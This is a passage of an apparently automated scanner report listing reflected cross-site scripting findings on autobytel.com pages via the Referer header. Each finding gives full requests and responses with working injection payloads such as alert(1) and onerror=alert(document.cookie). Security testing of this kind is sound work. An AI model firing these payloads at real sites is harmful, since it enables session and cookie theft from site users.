Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed00ae%22%3Balert%281%29%2F%2F0ebf00d462;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34781

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~d00ae";alert(1)//0ebf00d462";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4786E60E-D777-87FD-087F806C
...[SNIP]...

4.1947. http://www.autobytel.com/content/shared/modProfile/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.autobytel.com
Path:	/content/shared/modProfile/index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2928"><a>d6ef5eee369 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /content/shared/modProfile/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f2928"><a>d6ef5eee369

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:37 GMT
Content-Length: 4302
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:37 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/

<html>
<head>
   <title>Signup</title>
   <link rel="stylesheet" type="text/css" href="/interface/abtl/cars.css">
</head>
<body>

       <span class="DefaultFont">
       <form action="#a.FormAction#
...[SNIP]...
<input type="Hidden" name="LinkBackURL" value="http://www.google.com/search?hl=en&q=f2928"><a>d6ef5eee369">
...[SNIP]...

4.1948. http://www.autobytel.com/content/shared/modProfile/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.autobytel.com
Path:	/content/shared/modProfile/index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b2d"><a>85fc07a108 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /content/shared/modProfile/index.cfm?id=4;ABTL&action=handler HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f0b2d"><a>85fc07a108

Response (redirected)

4.1949. http://www.autobytel.com/coupons/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/coupons/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f142"%3balert(1)//d4b4f172a3f was submitted in the Referer HTTP header. This input was echoed as 3f142";alert(1)//d4b4f172a3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3f142"%3balert(1)//d4b4f172a3f

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:19 GMT
Content-Length: 22204
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:18 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3f142%22%3Balert%281%29%2F%2Fd4b4f172a3f;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~3f142";alert(1)//d4b4f172a3f";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "488F0E0F-FCD0-2D02-7FBD629B
...[SNIP]...

4.1950. http://www.autobytel.com/coupons/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/coupons/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a8404--><img%20src%3da%20onerror%3dalert(1)>ab45ce7e0a2 was submitted in the Referer HTTP header. This input was echoed as a8404--><img src=a onerror=alert(1)>ab45ce7e0a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:28 GMT
Content-Length: 22242
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ea8404%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Eab45ce7e0a2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>ab45ce7e0a2 -->
...[SNIP]...

4.1951. http://www.autobytel.com/diagnose-problem/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/diagnose-problem/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9f889--><img%20src%3da%20onerror%3dalert(1)>be04e3ce11a was submitted in the Referer HTTP header. This input was echoed as 9f889--><img src=a onerror=alert(1)>be04e3ce11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=9f889--><img%20src%3da%20onerror%3dalert(1)>be04e3ce11a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:13 GMT
Content-Length: 22286
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E9f889%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ebe04e3ce11a;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>be04e3ce11a -->
...[SNIP]...

4.1952. http://www.autobytel.com/diagnose-problem/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/diagnose-problem/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 913d2"%3balert(1)//030d163c2c3 was submitted in the Referer HTTP header. This input was echoed as 913d2";alert(1)//030d163c2c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 22248
Expires: Mon, 24 Jan 2011 23:54:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:04 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:04 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E913d2%22%3Balert%281%29%2F%2F030d163c2c3;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~913d2";alert(1)//030d163c2c3";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "487A91E6-0EE4-A9FC-119723D4
...[SNIP]...

4.1953. http://www.autobytel.com/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca510"%3balert(1)//6d1000ff8b8 was submitted in the Referer HTTP header. This input was echoed as ca510";alert(1)//6d1000ff8b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=ca510"%3balert(1)//6d1000ff8b8

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:30 GMT
Content-Length: 22126
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eca510%22%3Balert%281%29%2F%2F6d1000ff8b8;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~ca510";alert(1)//6d1000ff8b8";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4887B1AF-F9A2-1895-65F5E323
...[SNIP]...

4.1954. http://www.autobytel.com/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 7aff0--><img%20src%3da%20onerror%3dalert(1)>4f750af4e81 was submitted in the Referer HTTP header. This input was echoed as 7aff0--><img src=a onerror=alert(1)>4f750af4e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:43 GMT
Content-Length: 22164
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7aff0%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4f750af4e81;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>4f750af4e81 -->
...[SNIP]...

4.1955. http://www.autobytel.com/new-car-price-quotes.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-car-price-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6951a"%3balert(1)//ac31482b0ba was submitted in the Referer HTTP header. This input was echoed as 6951a";alert(1)//ac31482b0ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=6951a"%3balert(1)//ac31482b0ba

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:46 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E6951a%22%3Balert%281%29%2F%2Fac31482b0ba;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~6951a";alert(1)//ac31482b0ba";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48933F96-0C12-2A9C-5A69CBDA
...[SNIP]...

4.1956. http://www.autobytel.com/new-car-price-quotes.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-car-price-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 7ce62--><img%20src%3da%20onerror%3dalert(1)>17e96f6cd8f was submitted in the Referer HTTP header. This input was echoed as 7ce62--><img src=a onerror=alert(1)>17e96f6cd8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:04 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:04 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7ce62%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E17e96f6cd8f;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62788

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>17e96f6cd8f -->
...[SNIP]...

4.1957. http://www.autobytel.com/new-cars.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-cars.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86efc"%3balert(1)//865d083b25d was submitted in the Referer HTTP header. This input was echoed as 86efc";alert(1)//865d083b25d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
